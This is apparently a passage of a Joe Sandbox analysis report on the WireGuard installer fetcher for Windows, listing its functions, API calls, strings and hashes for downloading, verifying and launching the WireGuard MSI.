Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: Window$Message$NumbersSendVersion$AppendDescriptorFileLongPathSecurityShow_snprintf_smemcpy$ByteCharCloseConvertCreateDirectoryFreeHandleLocalMultiPostStringTextWideWindowsWriteexitmemsetwcstoul
String ID: ,$/windows-client/latest.sig$C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4$C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4$Download Error$O:BAD:PAI(A;;FA;;;BA)$Something went wrong when downloading the WireGuard installer. Would you like to open your web browser to the MSI download page?$Temp$WireGuard-Fetcher/1.0 (Windows 10.0.17134; amd64)$connecting to server$creating temporary file$determining architecture$determining paths$download.wireguard.com$downloading installer$downloading installer list$gj$https://download.wireguard.com/windows-client/$launching installer$verifying installer$verifying installer list
API String ID: 2889273075-1943668686
Opcode ID: 2163171f6eca8f506c914d5903026079e2e7f9cb0e8c8526b21afbe2216916ab
Instruction ID: 5ad0e0e4c8812481ecefc610aedcb3537d3f649999be24a26dd3b6a470b65f08
Opcode Fuzzy Hash: 2163171f6eca8f506c914d5903026079e2e7f9cb0e8c8526b21afbe2216916ab
Instruction Fuzzy Hash: 8D12C6756063419BE713EF68CC61BABB7E8AFD8700F008A2EF9C4962D2EB709545C751

Uniqueness

Uniqueness Score: -1.00%

Function 00301110 Relevance: 19.7, APIs: 13, Instructions: 202
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoA.KERNEL32(?), ref: 0030115A
Sleep.KERNEL32(000003E8), ref: 00301195
_amsg_exit.MSVCRT ref: 003011BB
_initterm.MSVCRT ref: 003011E6
_initterm.MSVCRT ref: 00301202
SetUnhandledExceptionFilter.KERNEL32(00301A70), ref: 0030123C
__p__acmdln.MSVCRT ref: 00301266
malloc.MSVCRT ref: 003012F5

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: _initterm$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_amsg_exitmalloc
String ID:
API String ID: 1782726447-0
Opcode ID: cdf6b31a6f28886dfa0ed985c49866856d35822a6b0d91b43cb0a507a5ad0b1a
Instruction ID: 304a9f9ce1afe00fc5b9d19036baebb9cbc29071e3c020b301a65bbe76e28530
Opcode Fuzzy Hash: cdf6b31a6f28886dfa0ed985c49866856d35822a6b0d91b43cb0a507a5ad0b1a
Instruction Fuzzy Hash: A571CD759032009FE72B9F64DC62B66B7E9AF45340F05042AFA458B2E1EB369844CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00308617 Relevance: 24.1, APIs: 16, Instructions: 126
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDllDirectoryA.KERNEL32(0030BBE8), ref: 00308623
SetDefaultDllDirectories.KERNEL32(00000800,?,?,00301437,0030D178,00000000,0030D17C,0030D000,0030D1A0,?,00301397), ref: 00308639
CreateWindowExA.USER32 ref: 0030869F
GetDC.USER32(00000000), ref: 003086BD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003086C8
ReleaseDC.USER32(00000000), ref: 003086E9
LoadIconA.USER32(?,00000007), ref: 003086F2
SendMessageA.USER32(00000080,00000001,00000000), ref: 00308711
SendMessageA.USER32(00000080,00000000,00000000), ref: 0030871C
SendMessageA.USER32(0000040A,00000001,00000000), ref: 0030872E
SetWindowPos.USER32(-00000001,-00000001,-00000001,00000000,?,00000042), ref: 00308761
_onexit.MSVCRT ref: 0030876C
CreateThread.KERNELBASE ref: 0030877E
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00308798
TranslateMessage.USER32(?), ref: 0030879F
DispatchMessageA.USER32(?), ref: 003087A6

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: Message$Send$CreateWindow$CallbackCapsDefaultDeviceDirectoriesDirectoryDispatchDispatcherIconLoadReleaseThreadTranslateUser_onexit
String ID:
API String ID: 524542433-0
Opcode ID: 26c944882916705b8ebe996ce665f53e826231c1969006d582fa316135a93096
Instruction ID: 9fdfb13d703681140671af245bcbe65053c6c2d961e55e6d9db33c1784e0452a
Opcode Fuzzy Hash: 26c944882916705b8ebe996ce665f53e826231c1969006d582fa316135a93096
Instruction Fuzzy Hash: 3B41C375506314AFD313AB66DC59EABBFFCEF8D740F00861AF588A2160DB704841CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003087B6 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 120
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

exit.MSVCRT ref: 00308801
GetWindowTextA.USER32(?,00001000), ref: 00308821
memchr.MSVCRT ref: 0030884E
_snprintf_s.MSVCRT ref: 003088D1
SetWindowTextA.USER32 ref: 003088E1
GetWindowLongA.USER32(000000F0), ref: 003088EF
SetWindowLongA.USER32(000000F0,00000000), ref: 00308905
SendMessageA.USER32(0000040A,00000000,00000000), ref: 0030891A
SendMessageA.USER32(00000406,00000000,?,00001000), ref: 0030893A
SendMessageA.USER32(00000402,00000000,?,00001000), ref: 0030894E

Strings

., xrefs: 00308839
., xrefs: 0030883F
., xrefs: 00308832

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: Window$MessageSend$LongText$_snprintf_sexitmemchr
String ID: .$.$.
API String ID: 2237789063-2288966034
Opcode ID: 102cf9972266969f8c2b91cc18703140bb12ecd3008f6a42cfac4860f9e7031c
Instruction ID: d64a15a8ace7ece1ef5bd108883d10e5451e04d6b1146d45e2edde6fa7a0f1b2
Opcode Fuzzy Hash: 102cf9972266969f8c2b91cc18703140bb12ecd3008f6a42cfac4860f9e7031c
Instruction Fuzzy Hash: 64411471546340ABE723AB35DC5ABDABBBDEF5E350F008719F584A61E1CB710880CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00309635 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf_s.MSVCRT ref: 00309658
memchr.MSVCRT ref: 00309818
memchr.MSVCRT ref: 0030983E
memcmp.MSVCRT ref: 003098A6
memchr.MSVCRT ref: 0030990E
memcmp.MSVCRT ref: 00309948
memcpy.MSVCRT ref: 003099D1

Strings

.msi, xrefs: 0030995F
wireguard-%s-, xrefs: 0030964E

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: memchr$memcmp$_snprintf_smemcpy
String ID: .msi$wireguard-%s-
API String ID: 3319652548-1103492904
Opcode ID: 74fdb636d669210118d4309d921a4cad7c4925515586c296b71ce73d72a00bdc
Instruction ID: bb9089556c36f1255077a295e3502e48bd699f0605cd490e234ccafa0a08766b
Opcode Fuzzy Hash: 74fdb636d669210118d4309d921a4cad7c4925515586c296b71ce73d72a00bdc
Instruction Fuzzy Hash: 1BA1353092A3555FD7138B38DC6176AFBA8AFA2340F04C71FF994B6692F73189498305

Uniqueness

Uniqueness Score: -1.00%

Function 003091F7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0030920C
_snprintf_s.MSVCRT ref: 0030922E
SetWindowTextA.USER32 ref: 00309239
SendMessageA.USER32(?,00000406,00000000,00000064), ref: 00309255
SendMessageA.USER32(?,00000402,00000000,00000000), ref: 0030925F
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00309268
SendMessageA.USER32(?,0000040A,00000001,00000000), ref: 00309277

Strings

WireGuard: %s..., xrefs: 00309221

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: MessageSendWindow$Long$Text_snprintf_s
String ID: WireGuard: %s...
API String ID: 4224949883-348357338
Opcode ID: 09b26ffc63c72e90b23f4829e148e2b9959a506a738a4aedbf5f4165c3a229a1
Instruction ID: 39ef2b1c79b65f4479300017959571925c769ed5ffc1aad2443895b84c73bb27
Opcode Fuzzy Hash: 09b26ffc63c72e90b23f4829e148e2b9959a506a738a4aedbf5f4165c3a229a1
Instruction Fuzzy Hash: 5901F4312863183BE2262796EC5AF8B3A4CDB877BAF124211F315652D1CAE6284146B9

Uniqueness

Uniqueness Score: -1.00%

Function 00308974 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileInformationByHandle.KERNEL32(FFFFFFFF,00000004,00000001,00000001), ref: 00308992
CloseHandle.KERNEL32 ref: 003089A0
DeleteFileA.KERNELBASE(C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4), ref: 003089E2
GetLastError.KERNEL32 ref: 003089E8
Sleep.KERNEL32(000000C8), ref: 003089F4

Strings

C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4, xrefs: 003089DD

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: FileHandle$CloseDeleteErrorInformationLastSleep
String ID: C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4
API String ID: 1046608880-4025702774
Opcode ID: 487feb138b1ea511c875cf97506a8806e339d24c816bf869cce554b6f4d576a7
Instruction ID: ee95a9872b17f11cdefa3e03d138a1b35872ac3c1184554fd94775a381d2eb3f
Opcode Fuzzy Hash: 487feb138b1ea511c875cf97506a8806e339d24c816bf869cce554b6f4d576a7
Instruction Fuzzy Hash: 1C0147765032046BE22367B4AC64F767B5CD749334F098B12EA98C31E1DB328C8AC326

Uniqueness

Uniqueness Score: -1.00%

Function 00309284 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 171
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4,00004000,00308DF7), ref: 00309298
abort.MSVCRT ref: 003092A3
LoadLibraryExA.KERNELBASE(?,00000000,00000800), ref: 003092BF

Strings

C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4, xrefs: 00309289

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWideabort
String ID: C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4
API String ID: 1760212676-4025702774
Opcode ID: e6e40d862b59e46f58930081098b50542cbe0ca5c68f5e4edca32098803fcb2c
Instruction ID: 4f0620808aa323987b607842d8fb4a6e6f52b94b2eaff9a632c9009206663a5e
Opcode Fuzzy Hash: e6e40d862b59e46f58930081098b50542cbe0ca5c68f5e4edca32098803fcb2c
Instruction Fuzzy Hash: 4861086582BB666ED3134B3DAC213A4FB1C6FA3385F48C317FDA475D52F72196468208

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00301A70 Relevance: 24.2, APIs: 16, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

signal.MSVCRT ref: 00301A94
signal.MSVCRT ref: 00301AA9
signal.MSVCRT ref: 00301AD3
signal.MSVCRT ref: 00301AF2
signal.MSVCRT ref: 00301B07
EnterCriticalSection.KERNEL32(0030D1E8,00000004,00000001), ref: 00301C5A
TlsGetValue.KERNEL32(00000000), ref: 00301C8D
GetLastError.KERNEL32(?,?,?,?,00301590,?,00000001,?), ref: 00301C91
InitializeCriticalSection.KERNEL32(0030D1E8), ref: 00301CB4
EnterCriticalSection.KERNEL32(0030D1E8), ref: 00301CE5
TlsGetValue.KERNEL32(00000000), ref: 00301D19
GetLastError.KERNEL32 ref: 00301D1D
LeaveCriticalSection.KERNEL32(0030D1E8), ref: 00301D37
free.MSVCRT(00000000,00000004,00000001), ref: 00301D54
DeleteCriticalSection.KERNEL32(0030D1E8,00000004,00000001), ref: 00301D7B

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: CriticalSectionsignal$EnterErrorLastValue$DeleteInitializeLeavefree
String ID:
API String ID: 1250594929-0
Opcode ID: 069a546361efa188390f1bc3b1c77d1b4e5e9098a86efa69a8203fc9d05eae72
Instruction ID: 63257bf72f183a86a6fb2a5419db5b3c07aff2275df52318fe335b67693bc6c4
Opcode Fuzzy Hash: 069a546361efa188390f1bc3b1c77d1b4e5e9098a86efa69a8203fc9d05eae72
Instruction Fuzzy Hash: F951FB317832149BE7339B98AD71B65739CBB54750F1A0213FA15D72E0EBB2DC448792

Uniqueness

Uniqueness Score: -1.00%

Function 003021A0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 220
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0030220D
GetProcAddress.KERNEL32(00000000,?), ref: 003022F0
GetLastError.KERNEL32 ref: 003022FF
RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 0030233C
LoadLibraryA.KERNEL32(?), ref: 00302398
LocalAlloc.KERNEL32(00000040,00000008), ref: 003023C5
FreeLibrary.KERNEL32(00000000), ref: 003023E5

Strings

$, xrefs: 003021CD
pI^t, xrefs: 003023E5

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: ExceptionLibraryRaise$AddressAllocErrorFreeLastLoadLocalProc
String ID: $$pI^t
API String ID: 637942872-2124069995
Opcode ID: 93b499c9d163c9ab11d9080568be2a0e2c1b1101123fb43aac77ee015514405d
Instruction ID: 272e993d1b0ffe6caa81ef05c4addd4034cbf2077ac72fcdb97acbc1131df336
Opcode Fuzzy Hash: 93b499c9d163c9ab11d9080568be2a0e2c1b1101123fb43aac77ee015514405d
Instruction Fuzzy Hash: 78816B742053019FD756CF59C8A8B2BB7E9FF88300F158A2EE988D72A0E770E840CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00309A6C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00309A88
GetProcAddress.KERNEL32(00000000,IsWow64Process2), ref: 00309A9A
GetCurrentProcess.KERNEL32 ref: 00309AA6
GetCurrentProcess.KERNEL32 ref: 00309AE2
IsWow64Process.KERNEL32(00000000,?), ref: 00309AEE

Strings

amd64, xrefs: 00309B02, 00309B25
x86, xrefs: 00309AFD, 00309B2C
IsWow64Process2, xrefs: 00309A94
arm, xrefs: 00309B1E
kernel32.dll, xrefs: 00309A83
arm64, xrefs: 00309ADB

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: Process$Current$AddressHandleModuleProcWow64
String ID: IsWow64Process2$amd64$arm$arm64$kernel32.dll$x86
API String ID: 2985595749-1124430016
Opcode ID: 9f3ff0655a0773f47f78ec93696681e18e2b14af9250c53f6ed1b60a4bbe5b6e
Instruction ID: f233b79ba5b7a9504e77888f5419157f940078209e3654176d1cb47b816d9edb
Opcode Fuzzy Hash: 9f3ff0655a0773f47f78ec93696681e18e2b14af9250c53f6ed1b60a4bbe5b6e
Instruction Fuzzy Hash: 01119071B072119BDB238724EC79BABF25C9B44B60F0A8927E946C71D5DB75CC01C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00301860 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00300000,0030BEFC,?,00301737,00000004), ref: 003018F6
VirtualProtect.KERNEL32(?,?,00000004,00000000,?,?,?,?,00300000,0030BEFC,?,00301737,00000004), ref: 0030195A
memcpy.MSVCRT ref: 00301974
GetLastError.KERNEL32( VirtualQuery failed for %d bytes at address %p,00000000,?,Address %p has no image-section,003010E0,?,?,?,?,00300000,0030BEFC,?,00301737,00000004), ref: 003019AB

Strings

Address %p has no image-section, xrefs: 00301982
VirtualProtect failed with code 0x%x, xrefs: 003019B2
VirtualQuery failed for %d bytes at address %p, xrefs: 003019A1

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: b8af2c600d0b18654593b3a5464e56694e5f062855f4eb6a58287d212573951c
Instruction ID: b572d667c53241ebcd36e754afafd0b3b501acee9a61d219cf010ca0338d8f60
Opcode Fuzzy Hash: b8af2c600d0b18654593b3a5464e56694e5f062855f4eb6a58287d212573951c
Instruction Fuzzy Hash: 2D3112716022059FD726AF98DCB5B6E77AEEB41344F098519F5458B2E2DB31EC00CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00301C30 Relevance: 8.8, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(0030D1E8,00000004,00000001), ref: 00301C5A
TlsGetValue.KERNEL32(00000000), ref: 00301C8D
GetLastError.KERNEL32(?,?,?,?,00301590,?,00000001,?), ref: 00301C91
InitializeCriticalSection.KERNEL32(0030D1E8), ref: 00301CB4
EnterCriticalSection.KERNEL32(0030D1E8), ref: 00301CE5
TlsGetValue.KERNEL32(00000000), ref: 00301D19
GetLastError.KERNEL32 ref: 00301D1D
LeaveCriticalSection.KERNEL32(0030D1E8), ref: 00301D37
free.MSVCRT(00000000,00000004,00000001), ref: 00301D54
DeleteCriticalSection.KERNEL32(0030D1E8,00000004,00000001), ref: 00301D7B

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastValue$DeleteInitializeLeavefree
String ID:
API String ID: 2290721084-0
Opcode ID: 040008574fd7f2d040b2946b6c2eee3858f58b801362f8e4952dae6e49c040ba
Instruction ID: 89154ce1ca63b8c5db20dc08bbf1babdfb0c853417ff6f0c163eb067939b3431
Opcode Fuzzy Hash: 040008574fd7f2d040b2946b6c2eee3858f58b801362f8e4952dae6e49c040ba
Instruction Fuzzy Hash: A021A235643204EBD3239F98EC74B76B3ADBB84750F1A1613E814836E0DBB2ED51CA81

Uniqueness

Uniqueness Score: -1.00%

Function 003019C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 003019E1
vfprintf.MSVCRT ref: 003019F8
abort.MSVCRT(?,?,?,?,?,?,?,?,003010E0,?,?,?,?,00300000,0030BEFC), ref: 00301A00

Strings

Mingw-w64 runtime failure:, xrefs: 003019DC

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: abortfwritevfprintf
String ID: Mingw-w64 runtime failure:
API String ID: 3176311984-2889761391
Opcode ID: c97b930622f5729ac4ba58f19387d4ceef972585fef299b566cd7bfe8dff0916
Instruction ID: c18cfd41d0ae52c04b696bdb1d351d872d7565cba02e344bb413b68b5e0bc259
Opcode Fuzzy Hash: c97b930622f5729ac4ba58f19387d4ceef972585fef299b566cd7bfe8dff0916
Instruction Fuzzy Hash: 0301D6B1D45B096BD702EF659C13A6B77A8EF8A360F004A19FC5C5A2C2EB31D5108693

Uniqueness

Uniqueness Score: -1.00%

Function 00309B3C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

RtlGetNtVersionNumbers.NTDLL(?,?), ref: 00309B58
_snprintf_s.MSVCRT ref: 00309B7F

Strings

WireGuard-Fetcher/1.0 (Windows %lu.%lu.%lu; %s), xrefs: 00309B6E
WireGuard-Fetcher/1.0 (Windows 10.0.17134; amd64), xrefs: 00309B42, 00309B7A

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.0000000000311000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636635815.0000000000313000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_300000_7ABGVF6Q.jbxd

Similarity

API ID: NumbersVersion_snprintf_s
